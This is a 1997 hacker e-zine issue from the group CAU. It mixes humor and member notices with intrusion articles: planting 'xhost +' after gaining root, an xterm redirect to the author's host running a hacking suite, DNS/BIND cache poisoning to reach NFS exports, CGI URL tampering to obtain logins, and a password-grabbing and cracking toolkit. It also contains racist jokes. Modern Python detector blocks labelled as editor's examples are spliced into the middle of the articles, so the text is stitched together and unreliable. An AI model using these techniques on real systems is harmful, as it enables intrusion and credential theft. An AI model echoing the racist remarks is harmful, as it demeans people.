Computer Academic Underground
Electronic Magazine
#0014
1215.97

##############################################################################

Table of Contents

Foreword                                                I)ruid
New CAU Member!                                         I)ruid

General
    Member Listing                                      -= CAU =-
    817 2600 Meeting                                    -= CAU =-
    Christmas Presents                                  -= CAU =-
    Visuals With Mr. Potatohead                         I)ruid
    Sublime's Top 20                                    Sublime

Hacking
    Fun with X App Display Redirection                  I)ruid
    Modern DNS/BIND Spoofing                            MajestiX
    CGI Hacking - Vol. 1                                broken-
    HackIt! v.1.0.0 Overview                            I)ruid
    Exploit of the Month                                -= CAU =-

Phreaking
    Stocking Stuffers                                   int3l
    I)ruid's Novice Corner                              I)ruid

Closing

##############################################################################

Foreword

Merry Christmas, and a Happy New Year. This is the Christmas 1997 issue of the
CAU E-Zine!

Anyway, not much has happened since the last zine came out, aside from me
working on various CAUGHQ stuff like coding and setting up new drivers for the
mailing lists and other system functions like that. I'm getting a much better
response from non-CAU members in relation to article submission and zine
feedback. A lot of good ideas for zine formatting and such have been sent to
the zine mail account, and I've gotten a couple of articles submitted to the
articles mail account. But anyway, enough of my rambling, on to the articles.
I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

New CAU Member!

I would like to announce the addition of our newest member, MajestiX, who was
nominated, voted on, and offered membership to the CAU on December 4th, around
10:30 pm.

I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Member Listing

(In the order in which they were brought into the CAU)

Handle               IRC Nick       E-Mail
--------------------------------------------------------------
I)ruid               I}ruid         druid@caughq.org
Ultra Violet         uv_            uv@caughq.org
Crimson Assassin     Crimson_A      crimson@caughq.org
Fizban               Fizban^        fizban@caughq.org
Sublime              sublime        sublime@caughq.org
int3l                int3l          int3l@caughq.org
MajestiX             maJesTix-      majestix@caughq.org
--------------------------------------------------------------

P.S. I (Sublime) would just like to say that an Egyptian should never be above
the WHITE man. :)

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

817 2600 Meeting

First Friday of Every Month
6:00pm until 9:00pm

Cafe Cybre
481 Harwood Road
Hurst, Texas
Phone: METRO: 817.268.0060

People are actually showing up every month...

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Christmas Presents

Merry Christmas! It's time to open presents, so bust out your tar and your gzip
and get ready, cuz Santa I)ruid is ready to pass out yer gifts... heh

For Christmas I give to the general population:

    HackIt! v.1.0.0 by I)ruid of [CAU]

Whee!!! Isn't this fun. All right, because of the complexity of this Systems
Administrator Tool Suite, I have written a separate section in this zine
dedicated to explaining a little more about it than I could in this section.
So go read it, download the .tar.gz'd version from the ftp site or the web
site, and have fun.
Oh, and just so you know, I wouldn't suggest using any scripts or admin tools I
write without at least learning a little bit about what it's doing and how it's
doing it. And if you're going to use the fruits of my labor to simply break
into as many systems as possible, at least learn how to do it manually
first... there's nothing I hate more than an ignorant script kiddie.

Also for Christmas, int3l has been generous enough to provide a whole BUNCH of
random phone stuff to stuff your stockings with. Check out the Phreaking
Section for his article this month, composed of a whole lot of random phone
tricks, tips and information (Stocking Stuffers).

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

How To Get Visuals With Mr. Potatohead

Okay, I know you're thinking "What tha???", but it's true! You can get some
pretty nifty visuals off of your monitor and a vibrating Mr. Potatohead. I have
seen these Mr. Potatoheads at Texas Drug Warehouse for around $2. I'm not sure
where else they are available, but I'm sure they can be found.

Anyway, first of all, you need Mr. Potatohead, your computer monitor, and some
test software. I suggest trying acidwarp, cthuga, and space invaders. Just run
your test software, sit back in your chair and look at the screen. It also
helps if the lights are turned out and the only light in the room is coming
from your monitor.

For a wavy, side-to-side effect, start up Mr. Potatohead and press his feet
into your temple on the side of your head. The harder you press, the more
extreme the effect. For a pulsating, up-and-down effect, placing Mr.
Potatohead behind your neck and leaning back in your chair works well.

I have found that acidwarp and cthuga provide for a constant, repetitive
effect, and other software such as space invaders that has small moving
sprites provides for a more non-repetitive experience.

Anyway, the point is, you can get some pretty nifty visuals off of Mr.
Potatohead.
He doesn't leave you feeling worse than when you started, and he's not
addictive.

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Sublime's Top 20 Reasons We Have Neither Seen, Nor Heard From UV (Ultra Violet).

( Read like David Letterman or it is not as effective! )

20 * Sold his car for a ride? (don't ask).
19 * Sent to Oklahoma by his mother who flipped out on him but he'll be back
     in a week. (* trust me *)
18 * Hired by the American gov. to be an Asian spy for his ability to blend in
     good with their appearance (and his excellent konichewah).
17 * Wandering the earth in search of the eternal PooF.
16 * Became a full time PIMP.
15 * Is widowed!
14 * Break Dance Camp .... in South Central L.A...
13 * Has dropped Ultra and is now just "Violet".
12 * Two words: DRUG LORD!
11 * Convinced 2 Pac is still alive.
10 * Perl scripting has claimed another victim.
 9 * Gone to find his real father PooF DaDDY.
 8 * Been hanging around monkeys with large afros.
 7 * Decided to actually KILL WHITEY!!
 6 * Stole THE SOBAKOWA PILLOW and has been in hibernation ... or hiding?
 5 * Finally got arrested for stalling out while stealing a SWB car.
 4 * Bet and LOST his soul to the devil in a GO-FISH game.
 3 * Went to HELL to get it back (His soul that is).
 2 * Has read int3l's article and pulled his own heat coil.
 1 * HIS MOM HAS CUT OFF HIS POOF AND HE HAS JOINED THE KLAN.
     (..You Know Which One..)

------------------------------------------------------------------
P.S. ( ..Myself, Sublime would just like to state that these are all in
     ( good humor, for we wouldn't want a poofy haired angry kid on our
     ( streets running wild... (possibly BUCK WILD)...
     )
-------------------------------------------------------------------

SuBLiME

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Fun with X App Display Redirection

Most people don't realize this, but most applications and programs designed
for use on a Unix X Window System have the command-line option -display or
-hostdisplay built in, as a standard. This command-line argument is a standard
X Toolkit command-line argument. If you're not familiar with this option, it
is a command-line switch to send the display of the program or application
being run to another host and display. Most of the time, the switch is
formatted like this:

    -display host:display

where host is the IP or hostname of the target machine and display is the X
Window display ID, in the format XSERVER.DISPLAY (normally you would want to
use 0.0, meaning the first X server and the active (first) display). What this
allows you to do is run (for example)

    xtetris -display TARGETIP:0.0

and send the display to that output. Mainly this is useful because you can use
the processing power and binaries on one machine and be working on another
completely different machine.

Now, "How can it be that easy???" you ask... It isn't. First of all, the
target machine must allow connections to its X server from your host. This is
accomplished via the xhost utility. From the xhost manpage:

    The xhost program is used to add and delete host names or user names to
    the list allowed to make connections to the X server.

If your host is not in the target machine's xhost allow list, your host will
not be allowed to send the display of its X binaries to the target's X server.
As far as I can tell, there is only one way around this: add yourself to the
xhost allow list on the target machine.
Xhost security permissions can only be changed by running xhost on the local
machine; you cannot be connected from a remote host and execute this command
successfully. One way I have found to add myself to the xhost allow list is to
gain root privileges on the target machine and edit the startx script, adding
the command line "xhost +" or "xhost +MY_IP" near the end of the file. Thus
the next time the X server is started, I will be allowed. It is also useful to
"accidentally" kill the X server (considering that you are root by now) to
cause the X Windows user to restart, thus executing the command line for you.
I mentioned two different command lines above for two reasons: first, "xhost
+" simply allows ALL connections to the X server, which could be useful, and
second, sometimes you may not want to put your IP in there. I'm sure you can
find other creative ways to add yourself to the xhost allow list, so I'll move
on.

Okay, now we are allowed to make connections to our target machine's X server.
One fun thing to do, if the target is a co-worker, is infect their desktop
with roaches, via xroach. I have found it funny to send a plague of 15 roaches
or so to my co-worker's desktop and wait for the "ACK!" when it surprises
them. Another funny surprise is to send someone xeyes... Just imagine you're
working, and a couple of eyes pop up and start watching your mouse. Did I
mention that the X user cannot kill these processes that are on their desktop
without killing their X server, because the process is not actually running
on their machine? (At least I have not found a way to do it.) Changing the
background can be accomplished on some window managers such as afterstep and
enlightenment.

As this is all fun and games, much more useful things can be accomplished with
this technique, as you will soon find out. And now, the flip side...
Not only can you run processes on your machine and send them to other people's
X servers, but you can also run processes on other people's machines and send
them to YOUR X server. This technique is used in many remote exploits in an
effort to gain a shell by redirecting an xterm. Since you have control over
your machine, running "xhost +" as root is not a problem. All you need on the
other machine is a login with enough access to run at least xterm, or any
other X application you want to run. If it's not an application or program
designed for X, you can usually run it inside an xterm and redirect the xterm.

As you can see, this can be very useful, especially when you nohup and
background the process, and then log out. If the remote machine has a modem
connected to an outside line, the xminicom utility is VERY useful.

And now, I'll let your imagination go wild, while I get on to other important
things I must do.

P.S.:

    $ nohup xterm -display caughq.org:0.0 -ut -e /root/hackit/hackit -l targetlist &
    $ logout
    Connection closed by foreign host.

I)ruid

[ EDITOR'S NOTE: After I wrote this article, I found some other interesting
  stuff to do with X Windows and display targeting on www.rootshell.com; you
  may want to check it out. Also, there are Windows 95 applications that
  emulate an X server, allowing redirection of X applications to Windows
  boxes. ]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Modern DNS/BIND Spoofing

Well, I meant to write this article for about, well... two zines back. So the
purposes of DNS/BIND spoofing now are very limited, but not completely
useless. Lots of people's first confrontations with any kind of spoofing are,
unfortunately, most likely IRC. From what I understand, and from personal
experience, DNS/BIND spoofing in IRC as of now is almost (if not) impossible.
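Editor's added example for the X display redirection article above (it belongs to that article, not to the DNS one that follows, and is not I)ruid's code): an audit that finds the planted "xhost +" / "xhost +HOST" lines in a startup script and reads the status line a bare `xhost` prints, so an admin can tell whether a display has been opened to remote hosts. The startx excerpt and the xhost output strings used for testing are constructed here.

```python
"""Audit X startup scripts and xhost state for opened access control.

Editor's added example for the X display redirection article; not I)ruid's
code.  The article plants "xhost +" (every host may connect) or "xhost +IP"
in startx so that remote "-display host:0.0" connections are accepted after
the next X restart.  audit_xhost_lines() finds such directives in a script's
text, and xhost_is_open() reads the status line a plain `xhost` invocation
prints.  The startx excerpt below is constructed for the example.
"""
import re
from typing import List, Tuple

# "xhost" at line start, after a separator, or after whitespace; group 1 = args.
XHOST_RE = re.compile(r"(?:^|[;&|]\s*|\s)xhost\b(.*)$")


def audit_xhost_lines(script_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, kind, line) for every active xhost line that widens access.

    kind is "open" for a bare "+" and "host" for "+name" or "+family:name"
    entries.  Removals ("xhost -...") and commented-out text are ignored.
    """
    findings: List[Tuple[int, str, str]] = []
    for no, raw in enumerate(script_text.splitlines(), start=1):
        code = raw.split("#", 1)[0]            # drop shell comments
        m = XHOST_RE.search(code)
        if not m:
            continue
        for arg in m.group(1).split():
            if arg == "+":
                findings.append((no, "open", raw.strip()))
                break
            if arg.startswith("+"):
                findings.append((no, "host", raw.strip()))
                break
    return findings


def xhost_is_open(xhost_output: str) -> bool:
    """True when xhost reports access control disabled (any host may connect)."""
    text = xhost_output.strip()
    first = text.splitlines()[0].lower() if text else ""
    return first.startswith("access control disabled")


# Constructed sample of a startx script with the article's modification planted.
SAMPLE_STARTX = """\
#!/bin/sh
# constructed sample, not a real distribution startx
xinit "$@"
xhost +             # planted: any host may connect to this X server
xhost +203.0.113.7  # planted: one remote host (documentation address)
# xhost +           (commented out, so inactive)
xhost -203.0.113.9  # removal, not a widening
"""

if __name__ == "__main__":
    for no, kind, line in audit_xhost_lines(SAMPLE_STARTX):
        print(f"line {no}: {kind}: {line}")
```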
About two or three months ago were the last days of possible IRC spoofing on
large IRC servers/networks such as EFNet, Undernet, DALNet, etc. Well, don't
give up your hopes just because you cannot go into channels and brag to your
friends about how cool you are because your address is:

    homie@stole.a.spaceship.from.nasa.gov

etc, etc... It doesn't mean that there is nothing else you can do. Original
DNS spoofing was not made to be able to take over channels, or to "brag." It
was used for gaining restricted remote access to computers that had wrappers,
etc. One of the most obvious tools that you can still, as of now, use DNS/BIND
spoofing for is exploiting NFS. It's not really exploiting, but more of a
tactic; even though you are exploiting BIND caching on the server too, it is
still more of a tactic, since the actual exploiting of the server itself is
such a minority in the whole process. So, I'm gonna include a so-called "kit"
on how to set up a site for spoofing, and a couple of example exploitation
tactics possible with modern DNS/BIND spoofing.

First, we will start with some of the rumors that I have heard about DNS/BIND
spoofing:

1.) Rumor: "The only DNS/BIND spoofer that works is erect.c."

    Fact: Bull crap, the only DNS/BIND spoofer that I have ever used
    personally is jizz.c. Now, I will admit any day that erect.c is far more
    efficient than jizz.c, and that jizz.c is definitely not completely
    dependable. But, later on in this article, I will provide a small shell
    script that will make jizz.c not only easier to use, but also a tad bit
    more efficient.

2.) Rumor: "When you use jizz.c you have to wait an hour before you can spoof
    the same IP again."

    Fact: This is a debatable rumor in itself. From what I understand, the
    history of jizz.c is quite varied. The older versions of jizz.c did not
    have a "TTL Modification Option." TTL stands for "Time To Live", and well,
    it means exactly what it says. TTL is the time that the "spoof" will live
    for.
    So, maybe in the past versions of jizz.c it DID take an hour for
    everything to "reset." But, in the newer versions of jizz.c you do have an
    option, and can change that rumor by yourself. So is it a rumor? You
    decide.

3.) Rumor: "I like to DNS/BIND spoof because I know that no one will know my
    real IP, so they can't hurt my system."

    Fact: Wrong, there *were* a couple of servers where this "rumor" was true.
    But the majority of servers allowed a simple command such as:

        /stat L homie

    which would show:

        %% irc.homie.NET homie[homie@69.69.69.69] 93 282 18 146 4

    and reveal your true identity.

Well, over the time that I had been DNS/BIND spoofing, and I was researching
it all, there were many more rumors that I had heard, but since it was so long
ago, those are the only ones that really stand out in my head right now.

Ok, now here are the simple steps to setting up a good DNS/BIND spoofing
"site." Let's go!:

0.) I didn't want to have to put this in here, but since some of you might be
    a little incompetent, I will remind you that you MUST have root on the
    authoritative NS. Without it, you're not gonna spoof jack-diddly-squat...
    ___bottom line___.

1.) Make sure that the NS (Nameserver that you plan on targeting) is an
    authoritative NS. What I mean by authoritative is that the NS has to be
    considered a "Class C" network registered by InterNIC. Determining this is
    quite simple: simply estimate how large the network itself is, and guess.
    Heck, you might not guess accurately, but I'm also assuming that you have
    nothing better to do.

2.) Patch the DNS software (BIND in this case) with a simple patch. The patch
    patches the file (from BIND's root directory) named/ns_req.c. To apply
    this patch to named/ns_req.c simply use the command "patch -p1 <
    ns_req.c" or any other options you would like to use; for more options
    RTFM! Type "man patch." After this patch is applied correctly, simply
    compile the NEW BIND just as you would minus the patch.
    The patch is below, and the patch itself should be named
    "ns_req.c.patch".

    ------Cut Here!------
    [ EDITOR'S NOTE: The actual patch has been cut out and put in the
      included file "ns_req.c.patch" for reading convenience. ]
    ------Cut Here!------

    The first 50 or so lines in the above patch will need some minor
    configuration, but not much.

3.) Well, you have compiled BIND correctly, and killall -HUP named. So, next
    of course, you install the spoofer itself. In this case, I'm going to use
    jizz.c as the example, since that's all I used. You can get jizz.c from
    many places. The best place to get it is:

        http://rootshell.connectnet.com

    You might want to edit this source till you are satisfied, but you will
    most likely not have to.

4.) Well, now you have the source, and by now have it compiled. Let's move on.
    Well, the process of spoofing with jizz is drawn out and extremely
    tiresome. So, I have found a shell script (location not released) that I
    have found *extremely* useful. Here it is:

    ------Cut Here!------
    [ EDITOR'S NOTE: Shell script also included in a separate file. I called
      it maj_script.sh ]
    ------Cut Here!------

    In the shell script above, there will be numerous lines that may include
    domain.net or hostname.domain.net. You need to customize that to fit the
    configuration of the NS that you are using. Then, name this file "crap"
    or something... it doesn't matter. Simply run "crap" and it will give you
    output such as:

        usage: jizzinterface

    The syntax of this script is determined once again by the configuration
    of the NS itself.

5.) Well, you have patched BIND, you have downloaded and compiled jizz.c, you
    have configured the script; what next? Well, the fun stuff. If you have
    been reading this only to try and spoof IRC, you will be trying for an
    extremely long time. Why? Because it's not gonna happen. So move on to
    the next article at this point. Well, if you're here for the more logical
    purposes of DNS/BIND spoofing, then keep reading.
Here is ONE example of what you can do with DNS/BIND spoofing. Well, there's a
system that you want extremely bad, and there is no obvious way to gain access
to it. Its wrappers are set to deny everything except localhost and localnet.
But, wait! You haven't tried NFS showmount yet, have you? Well, let's find
out.

    > showmount -e target.net
    Export list for target.net:
    / (everyone)

Well, now you should be damn happy. But what if it was:

    > showmount -e target.net
    Export list for target.net:
    / (homie.target.net)

Then what? Give up? Nay... this is where DNS spoofing comes in handy. So what
do you do? Well, you simply cache a spoof to target.net which says that your
IP (69.69.69.69) resolves to homie.target.net and voila! You have complete
access to that system.

Well, the first thing you need to know in order to spoof is what NS target.net
is using. So, we go to our shell and type:

    > whois target.net

And then look for

    Domain servers in listed order:

Now, there should be *two* NS addresses listed below this line of text. Those
are two possible NSs the target host is using. But remember, they may very
well be nothing close to what you are looking for. But, let's say that it
shows

    NS.TARGET.NET      109.109.109.109
    NS1.TARGET.NET     109.109.109.1

or something like that. Then we will go into our NS, and simply run the
script, and tell it to cache to NS.TARGET.NET that

    69.69.69.69 == homie.target.net

Once this is done, you SHOULD be able to access the system via NFS. If you do
not know what to do from there, you need to be reading much more than just
this article.

Well, there is one other example that I can explain of what DNS/BIND spoofing
is useful for, but I will not actually explain it, just simply give a hint. So
here it is:

    PHF + RHOST + DNS/BIND Spoofing == Access!

So use your brain and figure it out.

If you have any questions/problems and/or death threats, please send them to:
majestix@caughq.org. Or you can sometimes reach me on an EFNet IRC server as
maJesTix-.
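Editor's added example for the NFS scenario in the DNS/BIND spoofing article above (not MajestiX's code and not part of the jizz/BIND kit): the export list "/ (homie.target.net)" is only as strong as the server's reverse lookup, so the check below parses a showmount export list and contrasts PTR-only client matching, which the poisoned cache entry defeats, with forward-confirmed reverse DNS, which additionally resolves the claimed name and requires the connecting IP to be among its A records (the tcp_wrappers PARANOID behaviour). DNS is replaced by constructed in-memory records so it runs offline; 203.0.113.10 is a documentation address and 69.69.69.69 is the attacker IP from the article.

```python
"""Forward-confirmed reverse DNS (FCrDNS) check for hostname-based NFS exports.

Editor's added example for the DNS/BIND spoofing article; not MajestiX's code.
The article's scenario is an export of "/ (homie.target.net)" on a server that
trusts whatever name the client IP reverse-resolves to, so a poisoned PTR
answer mapping 69.69.69.69 to homie.target.net is enough.  The defence modelled
here resolves the claimed name forward again and accepts it only if the
connecting IP is among its A records.  Records are constructed, not looked up.
"""
from typing import Callable, Dict, List

PtrLookup = Callable[[str], List[str]]   # ip address -> names claimed by PTR
ALookup = Callable[[str], List[str]]     # hostname   -> A record addresses

# Constructed records.  203.0.113.0/24 is a documentation range; 69.69.69.69 is
# the attacker address used in the article's own example.
A_RECORDS: Dict[str, List[str]] = {"homie.target.net": ["203.0.113.10"]}
PTR_RECORDS: Dict[str, List[str]] = {
    "203.0.113.10": ["homie.target.net"],   # legitimate trusted host
    "69.69.69.69": ["homie.target.net"],    # poisoned cache entry
}


def ptr_lookup(ip: str) -> List[str]:
    return PTR_RECORDS.get(ip, [])


def a_lookup(name: str) -> List[str]:
    return A_RECORDS.get(name.lower(), [])


def parse_showmount(output: str) -> Dict[str, List[str]]:
    """Parse 'showmount -e' text of the form shown in the article into
    {export_path: [client, ...]}; line 1 is the "Export list for" header."""
    exports: Dict[str, List[str]] = {}
    for line in output.splitlines()[1:]:
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        path, clients = parts
        exports[path] = [c.strip() for c in clients.strip().strip("()").split(",")
                         if c.strip()]
    return exports


def naive_allowed(clients: List[str], ip: str, ptr: PtrLookup) -> bool:
    """PTR-only matching: the behaviour the article's spoof defeats."""
    if "everyone" in clients:
        return True
    claimed = {n.lower() for n in ptr(ip)}
    return any(c.lower() in claimed for c in clients)


def forward_confirmed_names(ip: str, ptr: PtrLookup, a: ALookup) -> List[str]:
    """Return the PTR names of ip whose own A records include ip."""
    return [n.lower() for n in ptr(ip) if ip in a(n)]


def confirmed_allowed(clients: List[str], ip: str, ptr: PtrLookup, a: ALookup) -> bool:
    """FCrDNS matching: a name counts only when the forward lookup agrees, so a
    poisoned PTR answer alone cannot satisfy it."""
    if "everyone" in clients:
        return True
    names = set(forward_confirmed_names(ip, ptr, a))
    return any(c.lower() in names for c in clients)


# Constructed showmount output in the article's layout.
SHOWMOUNT_OUTPUT = """\
Export list for target.net:
/               (homie.target.net)
/pub            (everyone)
"""

if __name__ == "__main__":
    for path, clients in parse_showmount(SHOWMOUNT_OUTPUT).items():
        for ip in ("203.0.113.10", "69.69.69.69"):
            print(path, ip,
                  "ptr-only:", naive_allowed(clients, ip, ptr_lookup),
                  "fcrdns:", confirmed_allowed(clients, ip, ptr_lookup, a_lookup))
```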
Usually in #skank or #817.

maJesTix

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

CGI Hacking - Vol. 1

A. General

1. Wut Is CGI

Well, you're prolly wondering what in the hell is a CGI. Well, a CGI is a
server-side executable. Basically, when you log in to your nifty porn site a
CGI processes the login and jumps you to the link, most of the time. CGIs are
used in forms a lot to process information, such as when you apply to
download the US version of Netscape...

2. Wut Is Perl

Perl is the Unix application in which "MOST" CGIs are written. They're mostly
written in binary format but some insist on running perl -t for text CGI
executables... kinda like ./bleh.sh. Perl has had its faults in the past for
being suid and stuff. If you don't know what suid is you're a clueless
moron....

3. Wut Is Unix

I'm not gonna go into detail about this one; in fact check att.com to see the
exact history of Unix... Unix was a project in the 60's which Berkeley
students worked on for AT&T. Of course AT&T funded the money, but eventually
it was adopted to run the PDP-11 phone switches; then the real multiuser
abilities were found... Around the same time the ARPA project was being done
by MIT and the gov. Unix seemed a great resource for it also, and well, you
can see what happened from there....

4. How do I get started?

Well, I'm glad I asked... Ok, you are horny and you want pr0n fast and
blehpron.com has a CGI form for entries. Well, you fill it out, fake
information of course... Ok, now it spits back some error like this:

    TransAction_FAILED

Look at the location bar in the browser; see it reads

    http://www.blehpron.com/deny.cgi?&f&TransAction_FAILED^BleH_ErroR

OK. Look at that for a second. THINK. Try this:

    http://www.blehpron.com/accept.cgi?&f&TransAction_FAILED^BleH_ErroR

Now it should take the stuff from the field of the query (btw, it isn't a
command line, it's a CGI query) and spit out your login and passwd.
INSTANT PORN

**** OK, if you have any sense at all you have seen ISPs that ALLOW for ****
**** you to fill out CGI based forms to apply for instant credited shells ****
**** Now that you have a """SHELL""" you can remotely hack the system and ****
**** should never see it coming cause well most ISPs are brain dead.      ****

Now that you have the basic idea, go for it. The more you know, the more you
get paid in your future job...

============= contact info =============

You can contact me, broken-, in EFnet's #2600, #telephony & #817 or
broken@cyberdude.com

broken-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

HackIt! v.1.0.0 Overview

Okay, as I mentioned in the CAU Files Released section, HackIt! v.1.0.0 is
your Christmas present from me. And if you don't celebrate Christmas, then I'm
just giving it to you for the hell of it. Anyway, here's a breakdown of how it
works, how to add to the HackIt! Suite, and generally what it can be used for.

First of all, how does it work? It's real simple. The main HackIt! module is
not complicated at all. It simply looks at the 'hackit.cf' file and executes
each individual module, in the order that they are found in the file.
Basically just a program that runs other programs. The beauty of this is that
HackIt! is completely modular, and it can run as many modules as you want to
put into the config file. The actual attack/exploitation of sites comes from
the individual modules, not HackIt! itself.

Here's an explanation of each level of modules and their general purpose. You
can have more than three levels; however, I find it simpler to categorise all
modules into one of the three levels. The three levels of modules work
together by leaving files for the next level. For example, the first level
modules leave files for the second level modules to find, the second level
leaves files for the third level to find, and so on until the last level,
which leaves an output file for the user.
Any type of module can be designed for HackIt!, as long as it knows what type
of file and format of filename to leave for the next level modules to take
care of. For example, first level modules Phfit, Phpit and NFSit all leave
'exploit_id-hostname.passwd' files for the second level module CrackIt to
find. It's all about knowing where to leave stuff and what to call it.

The first level of modules is designed for remote penetration testing. The
three modules that come included with HackIt! v.1.0.0 (Phfit, Phpit, and
NFSit) are designed to grab password files via Phf, Php and NFS, and leave
them for the second level module Crackit. First level modules do not
necessarily have to grab password files; they can be designed to probe for
open ports and leave a list for the second level modules, or check a host to
see if it's mountable via smbclient and leave an info file on the host for a
second level module to find. I'll leave this up to 3rd parties who want to
develop modules for HackIt, and I'll worry about my own module development.

Second level modules are mainly designed for doing local work on the results
of the first level, such as Crackit, which cracks password files left by the
first level modules Phfit, Phpit and NFSit. I only run the first two rules of
crack to speed up the process, but the passwd files could be saved for manual
cracking at a later time. My first level modules leave the *.passwd files in
./.tmp/ for later use, and my second level module (CrackIt!) leaves *.cracked
files there also, but be careful, because HackIt! cleans this directory every
time it's run (after all, it is a temp directory).

Third level modules are designed to act on the results of second level
modules. There are no third level modules developed at this time, but I plan
to develop RootIt, to attempt to log in to the target system based on logins
and passwords provided by CrackIt, and try a few generic exploits.
There are other programs that exist out there similar to this, which could be
easily used as a HackIt! module with minimal modification. Like I said, it's
all about knowing where to have your modules leave certain files for the next
level of modules.

These types of modules are not bound to these levels; these are just the level
definitions that I choose to work with, and I will develop modules for in the
future. You could have 80 levels of modules if you wanted to develop them, but
I choose to have 3 levels. It's all based on your personal preference.

I designed the HackIt! Suite to be flexible and hopefully it will suit
everyone's needs, from the script kiddie that should get a clue, to the busy
Security Administrator that doesn't have time to check every machine on his
network for new exploits, to the crazy-insane hacker that just wants to skip
the boring routine of checking systems for basic and old exploits when they
could be doing other things like taking over GTE Cybercenters... heh... When a
new exploit comes out, hopefully someone will develop a set of HackIt! modules
(I will attempt to do this frequently) and you will be able to get these
modules, plug them in, and test your network. This Suite was mainly designed
as a Security Administrator's tool, so don't abuse it, or I will have to hunt
you down and beat a clue into your skull.

If the HackIt! Suite gets a decent response, and people actually do develop
modules for it, I will set up a HackIt! support page on the CAUGHQ website to
support and maintain HackIt!, as well as provide a single location to get the
newest modules, information, and versions of the HackIt! Suite.

Anyway, that's about it for the general overview, so check the documentation
for more detailed information. HackIt! is available on the CAUGHQ ftp server
(ftp.caughq.org) and the CAUGHQ website (www.caughq.org), so go get it.
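Editor's added example accompanying the Exploit of the Month entry on Teardrop below (it is not teardrop.c, which ships as a separate file with this issue, and not CAU code): a detector for the fragment layout Teardrop relies on, written from the defender's side. It parses offset, payload length and the MF flag out of raw IPv4 headers and reports any fragment that lies entirely inside the fragment preceding it, which is the case where reassembly code computing a trimmed length as (end - previous_end) goes negative. The sample packets are constructed in the file (zero-filled payloads, no checksum) purely to exercise the check.

```python
"""Detect the overlapping-fragment layout that the Teardrop DoS relies on.

Editor's added example for the Exploit of the Month entry; not teardrop.c and
not CAU code.  Teardrop sends one fragment and then a second that starts
inside the first but ends before the first one ends.  Reassembly code that
trims the overlap as (end - previous_end) obtains a negative length, which the
affected kernels used as a huge unsigned copy size.  The functions below
reconstruct each fragment's byte extent from the IPv4 header and report the
fragments that would produce that negative trim.  Sample packets are
constructed here: bare headers with zero-filled payloads, not captured data.
"""
import struct
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Fragment:
    offset: int   # first byte of this fragment in the datagram (offset field * 8)
    length: int   # payload bytes carried (total length - header length)
    more: bool    # MF flag

    @property
    def end(self) -> int:
        return self.offset + self.length


def fragment_from_packet(pkt: bytes) -> Fragment:
    """Read offset, payload length and MF out of a raw IPv4 header."""
    ver_ihl, _tos, total_len, _ident, flags_off = struct.unpack("!BBHHH", pkt[:8])
    ihl = (ver_ihl & 0x0F) * 4
    return Fragment(offset=(flags_off & 0x1FFF) * 8,
                    length=total_len - ihl,
                    more=bool(flags_off & 0x2000))


def find_teardrop_fragments(frags: List[Fragment]) -> List[Fragment]:
    """Return fragments nested entirely inside the fragment preceding them by
    offset.  A plain overlap (the later fragment reaches past the earlier one)
    is legal and is simply trimmed; only the nested case yields a negative
    trimmed length, so only that case is reported."""
    ordered = sorted(frags, key=lambda f: f.offset)
    suspicious: List[Fragment] = []
    for prev, cur in zip(ordered, ordered[1:]):
        if cur.offset < prev.end and cur.end < prev.end:
            suspicious.append(cur)
    return suspicious


def build_packet(offset: int, payload_len: int, more: bool, ident: int = 242) -> bytes:
    """Construct a minimal IPv4 packet for testing: UDP protocol number,
    checksum left at 0, unspecified addresses.  Not a transmittable packet."""
    flags_off = (0x2000 if more else 0) | (offset // 8)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                         flags_off, 64, 17, 0, bytes(4), bytes(4))
    return header + bytes(payload_len)


# Constructed samples: the nested layout Teardrop uses (second fragment at
# offset 24 carrying 4 bytes, inside a 36-byte first fragment) and a normal
# three-fragment datagram with no overlap.
TEARDROP_PACKETS = [build_packet(0, 36, True), build_packet(24, 4, False)]
NORMAL_PACKETS = [build_packet(0, 1480, True), build_packet(1480, 1480, True),
                  build_packet(2960, 100, False)]


def scan_packets(pkts: List[bytes]) -> List[Fragment]:
    """Parse raw packets and return the suspicious fragments among them."""
    return find_teardrop_fragments([fragment_from_packet(p) for p in pkts])


if __name__ == "__main__":
    print("teardrop sample:", scan_packets(TEARDROP_PACKETS))
    print("normal sample:  ", scan_packets(NORMAL_PACKETS))
```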
I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Exploit of the Month

Ok, this month the Exploit of the Month award has to go to Teardrop...
Teardrop is a fragmented ping attack that causes a fault in most Linux
kernels, as well as Windows 95 and Windows NT machines, and many other OSes,
causing the machine to either reboot or lock up, or generally go crazy. This
DoS attack is executed remotely, and the exploit code included can spoof the
